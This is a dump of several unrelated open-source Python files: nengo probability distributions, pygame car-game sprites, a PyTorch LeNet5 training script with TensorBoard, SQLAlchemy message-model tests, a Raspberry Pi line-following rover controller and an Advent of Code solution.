mean(values, n=100):\n samples = get_samples(values, n=n, rng=rng)\n print(\"%.4f\" % np.mean(samples))\n\n mean([1, 2, 3, 4])\n mean(nengo.dists.Gaussian(0, 1))\n\n .. testoutput::\n\n 2.5000\n 0.0598\n\n Parameters\n ----------\n dist_or_samples : `.Distribution` or (n, d) array_like\n Source of the samples to be returned.\n n : int\n Number samples to take.\n d : int or None, optional\n The number of dimensions to return.\n rng : RandomState, optional\n Random number generator.\n\n Returns\n -------\n samples : (n, d) array_like\n\n \"\"\"\n if isinstance(dist_or_samples, Distribution):\n return dist_or_samples.sample(n, d=d, rng=rng)\n return np.array(dist_or_samples)\n\n\nclass PDF(Distribution):\n \"\"\"An arbitrary distribution from a PDF.\n\n Parameters\n ----------\n x : vector_like (n,)\n Values of the points to sample from (interpolated).\n p : vector_like (n,)\n Probabilities of the ``x`` points.\n \"\"\"\n\n x = NdarrayParam(\"x\", shape=\"*\")\n p = NdarrayParam(\"p\", shape=\"*\")\n\n def __init__(self, x, p):\n super().__init__()\n\n psum = np.sum(p)\n if np.abs(psum - 1) > 1e-8:\n raise ValidationError(\n \"PDF must sum to one (sums to %f)\" % psum, attr=\"p\", obj=self\n )\n\n self.x = x\n self.p = p\n if len(self.x) != len(self.p):\n raise ValidationError(\n \"`x` and `p` must be the same length\", attr=\"p\", obj=self\n )\n\n # make cumsum = [0] + cumsum, cdf = 0.5 * (cumsum[:-1] + cumsum[1:])\n cumsum = np.cumsum(p)\n cumsum *= 0.5\n cumsum[1:] = cumsum[:-1] + cumsum[1:]\n self.cdf = cumsum\n\n def sample(self, n, d=None, rng=np.random):\n shape = self._sample_shape(n, d)\n return np.interp(rng.uniform(size=shape), self.cdf, self.x)\n\n\nclass Uniform(Distribution):\n \"\"\"A uniform distribution.\n\n It's equally likely to get any scalar between ``low`` and ``high``.\n\n Note that the order of ``low`` and ``high`` doesn't matter;\n if ``low < high`` this will still work, and ``low`` will still\n be a closed interval while ``high`` is open.\n\n Parameters\n ----------\n low : Number\n The closed lower bound of the uniform distribution; samples >= low\n high : Number\n The open upper bound of the uniform distribution; samples < high\n integer : boolean, optional\n If true, sample from a uniform distribution of integers. In this case,\n low and high should be integers.\n \"\"\"\n\n low = NumberParam(\"low\")\n high = NumberParam(\"high\")\n integer = BoolParam(\"integer\")\n\n def __init__(self, low, high, integer=False):\n super().__init__()\n self.low = low\n self.high = high\n self.integer = integer\n\n def sample(self, n, d=None, rng=np.random):\n shape = self._sample_shape(n, d)\n if self.integer:\n return rng.randint(low=self.low, high=self.high, size=shape)\n else:\n return rng.uniform(low=self.low, high=self.high, size=shape)\n\n\nclass Gaussian(Distribution):\n \"\"\"A Gaussian distribution.\n\n This represents a bell-curve centred at ``mean`` and with\n spread represented by the standard deviation, ``std``.\n\n Parameters\n ----------\n mean : Number\n The mean of the Gaussian.\n std : Number\n The standard deviation of the Gaussian.\n\n Raises\n ------\n ValidationError if std is <= 0\n\n \"\"\"\n\n mean = NumberParam(\"mean\")\n std = NumberParam(\"std\", low=0, low_open=True)\n\n def __init__(self, mean, std):\n super().__init__()\n self.mean = mean\n self.std = std\n\n def sample(self, n, d=None, rng=np.random):\n shape = self._sample_shape(n, d)\n return rng.normal(loc=self.mean, scale=self.std, size=shape)\n\n\nclass Exponential(Distribution):\n \"\"\"An exponential distribution (optionally with high values clipped).\n\n If ``high`` is left to its default value of infinity, this is a standard\n exponential distribution. If ``high`` is set, then any sampled values at\n or above ``high`` will be clipped so they are slightly below ``high``.\n This is useful for thresholding.\n\n The probability distribution function (PDF) is given by::\n\n | 0 if x < shift\n p(x) = | 1/scale * exp(-(x - shift)/scale) if x >= shift and x < high\n | n if x == high - eps\n | 0 if x >= high\n\n where ``n`` is such that the PDF integrates to one, and ``eps`` is an\n infinitesimally small number such that samples of ``x`` are strictly less\n than ``high`` (in practice, ``eps`` depends on floating point precision).\n\n Parameters\n ----------\n scale : float\n The scale parameter (inverse of the rate parameter lambda). Larger\n values make the distribution narrower (sharper peak).\n shift : float, optional\n Amount to shift the distribution by. There will be no values smaller\n than this shift when sampling from the distribution.\n high : float, optional\n All values larger than or equal to this value will be clipped to\n slightly less than this value.\n \"\"\"\n\n scale = NumberParam(\"scale\", low=0, low_open=True)\n shift = NumberParam(\"shift\")\n high = NumberParam(\"high\")\n\n def __init__(self, scale, shift=0.0, high=np.inf):\n super().__init__()\n self.scale = scale\n self.shift = shift\n self.high = high\n\n def sample(self, n, d=None, rng=np.random):\n shape = self._sample_shape(n, d)\n x = rng.exponential(self.scale, shape) + self.shift\n high = np.nextafter(self.high, np.asarray(-np.inf, dtype=x.dtype))\n return np.clip(x, self.shift, high)\n\n\nclass UniformHypersphere(Distribution):\n \"\"\"Uniform distribution on or in an n-dimensional unit hypersphere.\n\n Sample points are uniformly distributed across the volume (default) or\n surface of an n-dimensional unit hypersphere.\n\n Parameters\n ----------\n surface : bool, optional\n Whether sample points should be distributed uniformly\n over the surface of the hyperphere (True),\n or within the hypersphere (False).\n min_magnitude : Number, optional\n Lower bound on the returned vector magnitudes (such that they are in\n the range ``[min_magnitude, 1]``). Must be in the range [0, 1).\n Ignored if ``surface`` is ``True``.\n \"\"\"\n\n surface = BoolParam(\"surface\")\n min_magnitude = NumberParam(\"min_magnitude\", low=0, high=1, high_open=True)\n\n def __init__(self, surface=False, min_magnitude=0):\n super().__init__()\n if surface and min_magnitude > 0:\n warnings.warn(\"min_magnitude ignored because surface is True\")\n self.surface = surface\n self.min_magnitude = min_magnitude\n\n def sample(self, n, d=None, rng=np.random):\n if d is None or d < 1: # check this, since other dists allow d = None\n raise ValidationError(\"Dimensions must be a positive integer\", \"d\")\n\n samples = rng.randn(n, d)\n samples /= npext.norm(samples, axis=1, keepdims=True)\n\n if self.surface:\n return samples\n\n # Generate magnitudes for vectors from uniform distribution.\n # The (1 / d) exponent ensures that samples are uniformly distributed\n # in n-space and not all bunched up at the centre of the sphere.\n samples *= rng.uniform(low=self.min_magnitude ** d, high=1, size=(n, 1)) ** (\n 1.0 / d\n )\n\n return samples\n\n\nclass Choice(Distribution):\n \"\"\"Discrete distribution across a set of possible values.\n\n The same as Numpy random's `~numpy.random.mtrand.RandomState.choice`,\n except can take vector or matrix values for the choices.\n\n Parameters\n ----------\n options : (N, ...) array_like\n The options (choices) to choose between. The choice is always done\n along the first axis, so if ``options`` is a matrix, the options are\n the rows of that matrix.\n weights : (N,) array_like, optional\n Weights controlling the probability of selecting each option. Will\n automatically be normalized. If None, weights be uniformly distributed.\n \"\"\"\n\n options = NdarrayParam(\"options\", shape=(\"*\", \"...\"))\n weights = NdarrayParam(\"weights\", shape=(\"*\"), optional=True)\n\n def __init__(self, options, weights=None):\n super().__init__()\n self.options = options\n self.weights = weights\n\n weights = np.ones(len(self.options)) if self.weights is None else self.weights\n if len(weights) != len(self.options):\n raise ValidationError(\n \"Number of weights (%d) must match number of options (%d)\"\n % (len(weights), len(self.options)),\n attr=\"weights\",\n obj=self,\n )\n if not all(weights >= 0):\n raise ValidationError(\n \"All weights must be non-negative\", attr=\"weights\", obj=self\n )\n total = float(weights.sum())\n if total <= 0:\n raise ValidationError(\n \"Sum of weights must be positive (got %f)\" % total,\n attr=\"weights\",\n obj=self,\n )\n self.p = weights / total\n\n @property\n def dimensions(self):\n return np.prod(self.options.shape[1:])\n\n def sample(self, n, d=None, rng=np.random):\n if d is not None and self.dimensions != d:\n raise ValidationError(\n \"Options must be of dimensionality %d \"\n \"(got %d)\" % (d, self.dimensions),\n attr=\"options\",\n obj=self,\n )\n\n i = np.searchsorted(np.cumsum(self.p), rng.rand(n))\n return self.options[i]\n\n\nclass Samples(Distribution):\n \"\"\"A set of samples.\n\n This class is a subclass of `.Distribution` so that it can be used in any\n situation that calls for a `.Distribution`. However, the call to\n `.Distribution.sample` must match the dimensions of the samples or\n a `.ValidationError` will be raised.\n\n Parameters\n ----------\n samples : (n, d) array_like\n ``n`` and ``d`` must match what is eventually passed to\n `.Distribution.sample`.\n \"\"\"\n\n samples = NdarrayParam(\"samples\", shape=(\"...\",))\n\n def __init__(self, samples):\n super().__init__()\n self.samples = samples\n\n def sample(self, n, d=None, rng=np.random):\n samples = np.array(self.samples)\n shape = (n,) if d is None else (n, d)\n\n if d is None:\n samples = samples.squeeze()\n\n if d is not None and samples.ndim == 1:\n samples = samples[..., np.newaxis]\n\n if samples.shape[0] != shape[0]:\n raise ValidationError(\n \"Wrong number of samples requested; got \"\n \"%d, should be %d\" % (n, samples.shape[0]),\n attr=\"samples\",\n obj=self,\n )\n elif d is None and len(samples.shape) != 1:\n raise ValidationError(\n \"Wrong sample dimensionality requested; got \"\n \"'None', should be %d\" % (samples.shape[1],),\n attr=\"samples\",\n obj=self,\n )\n elif d is not None and samples.shape[1] != shape[1]:\n raise ValidationError(\n \"Wrong sample dimensionality requested; got \"\n \"%d, should be %d\" % (d, samples.shape[1]),\n attr=\"samples\",\n obj=self,\n )\n\n return samples\n\n\nclass SqrtBeta(Distribution):\n \"\"\"Distribution of the square root of a Beta distributed random variable.\n\n Given ``n + m`` dimensional random unit vectors, the length of subvectors\n with ``m`` elements will be distributed according to this distribution.\n\n Parameters\n ----------\n n: int\n Number of subvectors.\n m: int, optional\n Length of each subvector.\n\n See also\n --------\n nengo.dists.SubvectorLength\n \"\"\"\n\n n = IntParam(\"n\", low=0)\n m = IntParam(\"m\", low=0)\n\n def __init__(self, n, m=1):\n super().__init__()\n self.n = n\n self.m = m\n\n def sample(self, num, d=None, rng=np.random):\n shape = self._sample_shape(num, d)\n return np.sqrt(rng.beta(self.m / 2.0, self.n / 2.0, size=shape))\n\n def cdf(self, x):\n \"\"\"Cumulative distribution function.\n\n .. note:: Requires SciPy.\n\n Parameters\n ----------\n x : array_like\n Evaluation points in [0, 1].\n\n Returns\n -------\n cdf : array_like\n Probability that ``X <= x``.\n \"\"\"\n from scipy.special import betainc # pylint: disable=import-outside-toplevel\n\n sq_x = x * x\n return np.where(\n sq_x < 1.0, betainc(self.m / 2.0, self.n / 2.0, sq_x), np.ones_like(x)\n )\n\n def pdf(self, x):\n \"\"\"Probability distribution function.\n\n .. note:: Requires SciPy.\n\n Parameters\n ----------\n x : array_like\n Evaluation points in [0, 1].\n\n Returns\n -------\n pdf : array_like\n Probability density at ``x``.\n \"\"\"\n from scipy.special import beta # pylint: disable=import-outside-toplevel\n\n return (\n 2\n / beta(0.5 * self.m, 0.5 * self.n)\n * x ** (self.m - 1)\n * (1 - x * x) ** (0.5 * self.n - 1)\n )\n\n def ppf(self, y):\n \"\"\"Percent point function (inverse cumulative distribution).\n\n .. note:: Requires SciPy.\n\n Parameters\n ----------\n y : array_like\n Cumulative probabilities in [0, 1].\n\n Returns\n -------\n ppf : array_like\n Evaluation points ``x`` in [0, 1] such that ``P(X <= x) = y``.\n \"\"\"\n from scipy.special import betaincinv # pylint: disable=import-outside-toplevel\n\n sq_x = betaincinv(self.m / 2.0, self.n / 2.0, y)\n return np.sqrt(sq_x)\n\n\nclass SubvectorLength(SqrtBeta):\n \"\"\"Distribution of the length of a subvectors of a unit vector.\n\n Parameters\n ----------\n dimensions : int\n Dimensionality of the complete unit vector.\n subdimensions : int, optional\n Dimensionality of the subvector.\n\n See also\n --------\n nengo.dists.SqrtBeta\n \"\"\"\n\n def __init__(self, dimensions, subdimensions=1):\n super().__init__(dimensions - subdimensions, subdimensions)\n\n @property\n def dimensions(self):\n return self.n + self.m\n\n @property\n def subdimensions(self):\n return self.m\n\n\nclass CosineSimilarity(SubvectorLength):\n \"\"\"Distribution of the cosine of the angle between two random vectors.\n\n The \"cosine similarity\" is the cosine of the angle between two vectors,\n which is equal to the dot product of the vectors, divided by the L2-norms\n of the individual vectors. When these vectors are unit length, this is then\n simply the distribution of their dot product.\n\n This is also equivalent to the distribution of a single coefficient from a\n unit vector (a single dimension of ``UniformHypersphere(surface=True)``).\n Furthermore, ``CosineSimilarity(d+2)`` is equivalent to the distribution of\n a single coordinate from points uniformly sampled from the d-dimensional\n unit ball (a single dimension of\n ``UniformHypersphere(surface=False).sample(n, d)``). These relationships\n have been detailed in [Voelker2017]_.\n\n This can be used to calculate an intercept ``c = ppf(1 - p)`` such that\n ``dot(u, v) >= c`` with probability ``p``, for random unit vectors ``u``\n and ``v``. In other words, a neuron with intercept ``ppf(1 - p)`` will\n fire with probability ``p`` for a random unit length input.\n\n .. [Voelker2017]\n `Aaron R. Voelker, Jan Gosmann, and Terrence C. Stewart.\n Efficiently sampling vectors and coordinates from the n-sphere and\n n-ball. Technical Report, Centre for Theoretical Neuroscience,\n Waterloo, ON, 2017\n `_\n\n Parameters\n ----------\n dimensions: int\n Dimensionality of the complete unit vector.\n\n See also\n --------\n nengo.dists.SqrtBeta\n \"\"\"\n\n def __init__(self, dimensions):\n super().__init__(dimensions)\n\n def sample(self, num, d=None, rng=np.random):\n shape = self._sample_shape(num, d)\n sign = Choice((1, -1)).sample(np.prod(shape), rng=rng).reshape(*shape)\n return sign * super().sample(num, d, rng=rng)\n\n def cdf(self, x):\n return (super().cdf(x) * np.sign(x) + 1) / 2.0\n\n def pdf(self, x):\n return super().pdf(x) / 2.0\n\n def ppf(self, y):\n x = super().ppf(abs(y * 2 - 1))\n return np.where(y > 0.5, x, -x)\n\n\nclass DistributionParam(Parameter):\n \"\"\"A Distribution.\"\"\"\n\n equatable = True\n\n def coerce(self, instance, dist):\n self.check_type(instance, dist, Distribution)\n return super().coerce(instance, dist)\n\n\nclass DistOrArrayParam(NdarrayParam):\n \"\"\"Can be a Distribution or samples from a distribution.\"\"\"\n\n def __init__(\n self,\n name,\n default=Unconfigurable,\n sample_shape=None,\n sample_dtype=np.float64,\n optional=False,\n readonly=None,\n ):\n super().__init__(\n name=name,\n default=default,\n shape=sample_shape,\n dtype=sample_dtype,\n optional=optional,\n readonly=readonly,\n )\n\n def coerce(self, instance, distorarray):\n if isinstance(distorarray, Distribution):\n return Parameter.coerce(self, instance, distorarray)\n return super().coerce(instance, distorarray)\n","repo_name":"Kanaderu/Neural-Networks","sub_path":"nengo-master/nengo/dists.py","file_name":"dists.py","file_ext":"py","file_size_in_byte":19847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"23422358801","text":"from basic import *\r\nfrom copy import deepcopy\r\n\r\n\r\nclass Opponent(Sprite):\r\n CLR = (10, 10, 10)\r\n IMG_PATH = \"images/opponents/opponent.png\"\r\n SIZE = Size(CAR_W, CAR_L)\r\n SIDE_MIRROR = 15\r\n\r\n EVENT = 4\r\n T_RANGE = 1500, 2500\r\n\r\n def __init__(self, screen, pos, speed):\r\n super().__init__(screen, pos, self.SIZE, self.CLR)\r\n self.speed = speed\r\n\r\n self.img = pygame.image.load(self.IMG_PATH).convert()\r\n image_size = Size(self.img.get_width(), self.img.get_height())\r\n image_scale = image_size.get_scale()\r\n self.size.h = self.size.w // image_scale - 3\r\n self.img = pygame.transform.scale(self.img, (self.size.w, self.size.h))\r\n self.img.set_colorkey((0, 0, 0))\r\n\r\n def draw(self):\r\n self.screen.blit(self.img, (self.pos.x-self.size.w/2, self.pos.y-self.size.h/2))\r\n\r\n def update(self, div_speed):\r\n self.pos.y -= self.speed - div_speed\r\n\r\n def left_corner(self):\r\n return self.pos.x - self.size.w // 2 + self.SIDE_MIRROR\r\n\r\n def right_corner(self):\r\n return self.pos.x + self.size.w // 2 - self.SIDE_MIRROR\r\n\r\n\r\nclass Bullet(Sprite):\r\n CLR = (255, 255, 255)\r\n IMG_PATH = \"images/bullets/vib_bullet.jpg\"\r\n SOUND_PATH = \"sounds/bullet.mp3\"\r\n SIZE = Size(5, 10)\r\n SPEED = 3\r\n\r\n def __init__(self, screen, pos):\r\n super().__init__(screen, pos, self.SIZE, self.CLR)\r\n\r\n self.sound = pygame.mixer.Sound(self.SOUND_PATH)\r\n pygame.mixer.Sound.play(self.sound)\r\n\r\n self.img = pygame.image.load(self.IMG_PATH).convert()\r\n image_size = Size(self.img.get_width(), self.img.get_height())\r\n image_scale = image_size.get_scale()\r\n self.size.h = self.size.w / image_scale\r\n self.img = pygame.transform.scale(self.img, (self.size.w, self.size.h))\r\n self.img.set_colorkey((255, 255, 255))\r\n\r\n def draw(self):\r\n self.screen.blit(self.img, (self.pos.x-self.size.w/2, self.pos.y-self.size.h/2))\r\n\r\n def update(self, div_speed):\r\n self.pos.y -= self.SPEED + div_speed\r\n\r\n\r\nclass Victim(Sprite):\r\n CLR = (255, 10, 10)\r\n SIZE = Size(125, 125)\r\n\r\n EVENT = 3\r\n T_RANGE = 5000, 10000\r\n\r\n def __init__(self, screen, pos, img_path):\r\n super().__init__(screen, pos, deepcopy(self.SIZE), self.CLR)\r\n self.img_path = img_path\r\n self.img_unscaled = pygame.image.load(img_path).convert()\r\n image_size = Size(self.img_unscaled.get_width(), self.img_unscaled.get_height())\r\n image_scale = image_size.get_scale()\r\n self.size.w = self.size.h * image_scale // 2\r\n self.img = pygame.transform.scale(self.img_unscaled, (self.size.w*2, self.size.h))\r\n\r\n self.alpha = 255\r\n self.img.set_alpha(self.alpha)\r\n\r\n self.area = 0, 0, self.size.w, self.size.h\r\n self.transforming = False\r\n\r\n def draw(self):\r\n self.screen.blit(self.img, (self.pos.x-self.size.w/2, self.pos.y-self.size.h/2), self.area)\r\n\r\n def transform(self):\r\n self.transforming = True\r\n\r\n def update(self, div_speed):\r\n self.pos.y += div_speed\r\n\r\n if self.transforming:\r\n self.alpha -= self.size.w//25\r\n if self.alpha <= 0:\r\n self.alpha = 0\r\n else:\r\n self.size.increase(5)\r\n self.area = self.size.w, 0, self.size.w * 2, self.size.h\r\n self.img = pygame.transform.scale(self.img_unscaled, (self.size.w * 2, self.size.h))\r\n self.img.set_alpha(self.alpha)\r\n self.img.convert_alpha()\r\n\r\n\r\n","repo_name":"dosAidos/grand-prix","sub_path":"sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27251296616","text":"\"\"\"\n文件名: Code/Chapter05/C03_TensorboardUsage/main.py\n创建时间: 2023/3/4 7:01 下午\n作 者: @空字符\n公众号: @月来客栈\n知 乎: @月来客栈 https://www.zhihu.com/people/the_lastest\n\"\"\"\n\nimport torchvision.transforms as transforms\nfrom torchvision.datasets import FashionMNIST\nfrom torch.utils.data import DataLoader\nfrom transformers import get_cosine_schedule_with_warmup\nfrom torch.utils.tensorboard import SummaryWriter\nimport torch\nimport sys\nimport logging\n\nsys.path.append(\"../../\")\nfrom Chapter04.C03_LeNet5.LeNet5 import LeNet5\nfrom Chapter05.C02_LogManage.log_manage import logger_init\nimport tensorflow as tf\nimport tensorboard as tb\n\ntf.io.gfile = tb.compat.tensorflow_stub.io.gfile\n\ntext_labels = ['t-shirt', 'trouser', 'pullover', 'dress', 'coat',\n 'sandal', 'shirt', 'sneaker', 'bag', 'ankle boot']\n\n\ndef load_dataset(batch_size=64):\n fashion_train = FashionMNIST(root='~/Datasets/FashionMNIST', train=True,\n download=True, transform=transforms.ToTensor())\n fashion_test = FashionMNIST(root='~/Datasets/FashionMNIST', train=False,\n download=True, transform=transforms.ToTensor())\n train_iter = DataLoader(fashion_train, batch_size=batch_size, shuffle=True)\n test_iter = DataLoader(fashion_test, batch_size=batch_size, shuffle=True)\n return train_iter, test_iter\n\n\nclass ModelConfig(object):\n def __init__(self,\n batch_size=64,\n epochs=3,\n learning_rate=0.01):\n self.batch_size = batch_size\n self.epochs = epochs\n self.learning_rate = learning_rate\n self.summary_writer_dir = \"runs/lenet5\"\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n logger_init(log_file_name='lenet5', log_level=logging.INFO, log_dir='log')\n logging.info(\" ### 将当前配置打印到日志文件中 \")\n for key, value in self.__dict__.items():\n logging.info(f\"### {key} = {value}\")\n\n\ndef train(config):\n train_iter, test_iter = load_dataset(config.batch_size)\n model = LeNet5()\n num_training_steps = len(train_iter) * config.epochs\n optimizer = torch.optim.Adam([{\"params\": model.parameters(),\n \"initial_lr\": config.learning_rate}])\n scheduler = get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=300,\n num_training_steps=num_training_steps,\n num_cycles=2)\n writer = SummaryWriter(config.summary_writer_dir)\n model = model.to(config.device)\n model.train()\n for epoch in range(config.epochs):\n for i, (x, y) in enumerate(train_iter):\n x, y = x.to(config.device), y.to(config.device)\n loss, logits = model(x, y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step() # 执行梯度下降\n scheduler.step()\n if i % 50 == 0:\n acc = (logits.argmax(1) == y).float().mean()\n logging.info(f\"Epochs[{epoch + 1}/{config.epochs}]--batch[{i}/{len(train_iter)}]\"\n f\"--Acc: {round(acc.item(), 4)}--loss: {round(loss.item(), 4)}\")\n writer.add_scalar('Training/Accuracy', acc, scheduler.last_epoch)\n writer.add_scalar('Training/Loss', loss.item(), scheduler.last_epoch)\n writer.add_scalar('Training/Learning Rate', scheduler.get_last_lr()[0], scheduler.last_epoch)\n\n test_acc, all_logits, y_labels, label_img = evaluate(test_iter, model, config.device)\n logging.info(f\"Epochs[{epoch + 1}/{config.epochs}]--Acc on test {test_acc}\")\n writer.add_scalar('Testing/Accuracy', test_acc, scheduler.last_epoch)\n writer.add_embedding(mat=all_logits, # 所有点\n metadata=y_labels, # 标签名称\n label_img=label_img, # 标签图片\n global_step=scheduler.last_epoch)\n return model\n\n\ndef evaluate(data_iter, model, device):\n model.eval()\n all_logits = []\n y_labels = []\n images = []\n with torch.no_grad():\n acc_sum, n = 0.0, 0\n for x, y in data_iter:\n x, y = x.to(device), y.to(device)\n logits = model(x)\n acc_sum += (logits.argmax(1) == y).float().sum().item()\n n += len(y)\n all_logits.append(logits)\n y_pred = logits.argmax(1).view(-1)\n y_labels += (text_labels[i] for i in y_pred)\n images.append(x)\n return acc_sum / n, torch.cat(all_logits, dim=0), y_labels, torch.cat(images, dim=0)\n\n\ndef inference(model, fashion_test):\n y_true = fashion_test.targets[:5]\n imgs = fashion_test.data[:5].unsqueeze(1).to(torch.float32)\n with torch.no_grad():\n logits = model(imgs)\n y_pred = logits.argmax(1)\n print(f\"真实标签为:{y_true}\")\n print(f\"预测标签为:{y_pred}\")\n\n\nif __name__ == '__main__':\n config = ModelConfig()\n model = train(config)\n","repo_name":"moon-hotel/DeepLearningWithMe","sub_path":"Code/Chapter05/C03_TensorboardUsage/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"6"} +{"seq_id":"74552756666","text":"\"\"\"Message model tests.\"\"\"\n\nimport os\nfrom unittest import TestCase\nfrom sqlalchemy.exc import IntegrityError\nfrom models import db, User, Message, Like\n\n# Environmental variable for URL\nos.environ['DATABASE_URL'] = \"postgresql:///warbler_test\"\n\nfrom app import app\n\n# Create tables: once for all tests\ndb.drop_all()\ndb.create_all()\n\n\nclass MessageModelTestCase(TestCase):\n def setUp(self):\n \"\"\"Create demo data\"\"\"\n\n User.query.delete()\n\n u1 = User.signup(\n username=\"u1\",\n email=\"u1@email.com\",\n password=\"password\",\n image_url=None\n )\n\n u2 = User.signup(\n username=\"u2\",\n email=\"u2@email.com\",\n password=\"password\",\n image_url=None\n )\n\n m1 = Message(text=\"Sample text\")\n u1.authored_messages.append(m1)\n db.session.commit()\n\n self.u1_id = u1.id\n self.u2_id = u2.id\n self.m1_id = m1.id\n\n self.client = app.test_client()\n\n def tearDown(self):\n \"\"\"Clean up fouled transactions\"\"\"\n\n db.session.rollback()\n\n ########################################################################\n # Message model tests\n\n def test_message_model(self):\n \"\"\"Test message model with demo data\"\"\"\n\n u1 = User.query.get(self.u1_id)\n u2 = User.query.get(self.u2_id)\n\n # u1 should have 1 message\n self.assertEqual(len(u1.authored_messages), 1)\n self.assertEqual(u1.authored_messages[0].text, \"Sample text\")\n self.assertEqual(len(u2.authored_messages), 0)\n\n def test_message_model_invalid_message(self):\n \"\"\"Test message without text fails to create message\"\"\"\n\n with self.assertRaises(ValueError):\n msg = Message(text=\"\", user_id=self.u1_id)\n\n db.session.add(msg)\n db.session.commit()\n\n def test_message_model_invalid_author(self):\n \"\"\"Test author who does not exist fails to create message\"\"\"\n\n with self.assertRaises(IntegrityError):\n msg = Message(text=\"Sample Text\", user_id=1000)\n\n db.session.add(msg)\n db.session.commit()\n\n ########################################################################\n # authored_messages/author tests\n\n def test_message_author(self):\n \"\"\"Test that message has the expected author\"\"\"\n\n m1 = Message.query.get(self.m1_id)\n u1 = User.query.get(self.u1_id)\n\n self.assertEqual(m1.author, u1)\n self.assertEqual(u1.authored_messages, [m1])\n\n ########################################################################\n # Message likes tests\n\n def test_message_likes_valid(self):\n \"\"\"\n Test that a message has expected list of users_who_like, and user has\n expected list of liked_messages\n \"\"\"\n\n u2 = User.query.get(self.u2_id)\n msg = Message.query.get(self.m1_id)\n like = Like(user_id=self.u2_id, message_id=self.m1_id)\n\n db.session.add(like)\n db.session.commit()\n\n self.assertEqual(msg.users_who_liked, [u2])\n self.assertEqual(u2.liked_messages, [msg])\n\n def test_message_likes_invalid_user(self):\n \"\"\"\n Test that a message will not accept like from user who does not exist\n \"\"\"\n\n with self.assertRaises(IntegrityError):\n like = Like(user_id=1000, message_id=self.m1_id)\n db.session.add(like)\n db.session.commit()\n\n def test_message_likes_invalid_message(self):\n \"\"\"\n Test that a user cannot like a message that does not exist\n \"\"\"\n\n with self.assertRaises(IntegrityError):\n like = Like(user_id=self.u2_id, message_id=1000)\n db.session.add(like)\n db.session.commit()","repo_name":"ari-denary/warbler","sub_path":"test_message_model.py","file_name":"test_message_model.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"33291016429","text":"# boolean logic for sensor1/2.when_line does not seem to work. I'm not sure why\n\n\nfrom gpiozero import LineSensor\nimport RPi.GPIO as GPIO\nfrom time import sleep\nx = 75\nx1 = 0\nx2 = 100\nt = 0.25\n#Left sensor\nsensor1 = LineSensor(26)\n#Right sensor\nsensor2 = LineSensor(16)\nenA = 25\nenB = 12\n#Left motor - motor1\nin1 = 24\nin2 = 23\n#Right motor - motor2\nin3 = 20\nin4 = 21\n\nGPIO.setmode(GPIO.BCM)\n#motor 1\nGPIO.setup(in1,GPIO.OUT)\nGPIO.setup(in2,GPIO.OUT)\nGPIO.setup(enA,GPIO.OUT)\np1 = GPIO.PWM(enA,1000)\np1.start(25)\n#motor 2\nGPIO.setup(in3,GPIO.OUT)\nGPIO.setup(in4,GPIO.OUT)\nGPIO.setup(enB,GPIO.OUT)\np2 = GPIO.PWM(enB,1000)\np2.start(25)\n\n#Movement commands\ndef forward():\n print(\"going forwards\")\n p1.ChangeDutyCycle(x)\n p2.ChangeDutyCycle(x)\n GPIO.output(in3,GPIO.LOW)\n GPIO.output(in4,GPIO.HIGH)\n GPIO.output(in1,GPIO.LOW)\n GPIO.output(in2,GPIO.HIGH)\ndef turn_left():\n print(\"turning left\")\n p1.ChangeDutyCycle(x1)\n p2.ChangeDutyCycle(x2)\n GPIO.output(in3,GPIO.LOW)\n GPIO.output(in4,GPIO.HIGH)\n GPIO.output(in1,GPIO.LOW)\n GPIO.output(in2,GPIO.LOW)\ndef turn_right():\n print(\"turning right\")\n p1.ChangeDutyCycle(x2)\n p2.ChangeDutyCycle(x1)\n GPIO.output(in3,GPIO.LOW)\n GPIO.output(in4,GPIO.LOW)\n GPIO.output(in1,GPIO.LOW)\n GPIO.output(in2,GPIO.HIGH)\ndef stop():\n print(\"stopping\")\n GPIO.output(in3,GPIO.LOW)\n GPIO.output(in4,GPIO.LOW)\n GPIO.output(in1,GPIO.LOW)\n GPIO.output(in2,GPIO.LOW)\n\n#Sensor commands\ndef stay_on_line():\n print(\"staying on line\")\n forward()\n\n\ndef straighten():\n print(\"straightening\")\n stop()\n sleep(t)\n #if sensor1.when_line == True:\n turn_right()\n sleep(t)\n stop()\n sleep(t)\n #elif sensor2.when_line == True:\n turn_left()\n sleep(t)\n stop()\n sleep(t)\n \n\nprint(\"starting\")\n#stop()\n#sleep(1)\n#Needs both sensors bright to move forward \n#if sensor1.when_line == True and sensor2.when_line == True:\n #stay_on_line()\n \n#Needs only one sensor to go dark to straighten \n#sensor1.when_line = stay_on_line\nsensor1.when_no_line = straighten\n#sensor2.when_line = stay_on_line\nsensor2.when_no_line = straighten\ntry:\n # Repeat the next indented block forever\n while True:\n sleep(10)\n\n# If you press CTRL+C, cleanup and stop\nexcept KeyboardInterrupt:\n print(\"Exiting\")\n stop()\n","repo_name":"2062GlossyLedge/Rover-projects","sub_path":"autonomous rover #3/a3_rover2_2.py","file_name":"a3_rover2_2.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"75113973946","text":"from timeit import default_timer as timer\nimport re\n\nfile = open('input.txt')\n\npattern = r\"(?P\\d+)x(?P\\d+)x(?P\\d+)\";\nresult = 0\nstart = timer()\nfor line in file.readlines():\n\tmatches = re.match(pattern, line)\n\tdata = matches.groupdict();\n\n\tl = int(data[\"l\"])\n\tw = int(data[\"w\"])\n\th = int(data[\"h\"])\n\n\tdims = [l,w,h]\n\tdims.sort()\n\n\tresult += 2 * dims[0] + 2 * dims[1] + l * w * h\n\nprint(\"Completed in %fms\" % ((timer() - start) * 1000))\nprint(\"%d ft\" % result)","repo_name":"kmckenna525/advent-of-code","sub_path":"2015/day02/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} 